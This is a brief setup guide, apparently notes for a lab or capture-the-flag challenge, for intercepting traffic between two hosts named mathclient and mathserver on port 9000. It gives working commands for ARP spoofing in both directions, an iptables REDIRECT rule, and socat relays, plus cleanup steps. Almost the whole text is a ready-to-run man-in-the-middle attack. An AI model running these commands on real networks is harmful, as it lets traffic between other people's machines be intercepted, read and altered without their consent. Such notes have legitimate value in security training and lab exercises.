MITM Proxy Setup
Prerequisites
- Root access
arpspoofinstalled (dsniff package)
Setup Commands
1. Enable IP forwarding
sysctl -w net.ipv4.ip_forward=1
2. Start ARP spoofing (two terminals or background)
arpspoof -i eth1 -t 10.0.91.132 10.0.91.130 &
arpspoof -i eth1 -t 10.0.91.130 10.0.91.132 &
3. Redirect traffic to proxy
iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
Why iptables is needed: ARP spoofing makes traffic flow through our machine, but packets are still addressed to 10.0.91.130:9000. Without iptables, our kernel would just forward them onward. The REDIRECT rule intercepts packets before routing and rewrites the destination to localhost:9000, delivering them to our proxy instead.
4. Run proxy
Option A: socat (minimal, no logging)
socat TCP-LISTEN:9000,fork,reuseaddr TCP:10.0.91.130:9000
Option B: socat with hex dump
socat -x -v TCP-LISTEN:9000,fork,reuseaddr TCP:10.0.91.130:9000
Option C: Python script (with JSONL logging)
python3 math_solve.py
Cleanup Commands
Stop ARP spoofing
pkill arpspoof
Remove iptables rule
iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
Network Info
| Host | IP |
|---|---|
| mathclient | 10.0.91.132 |
| mathserver | 10.0.91.130 |
| Port | 9000 |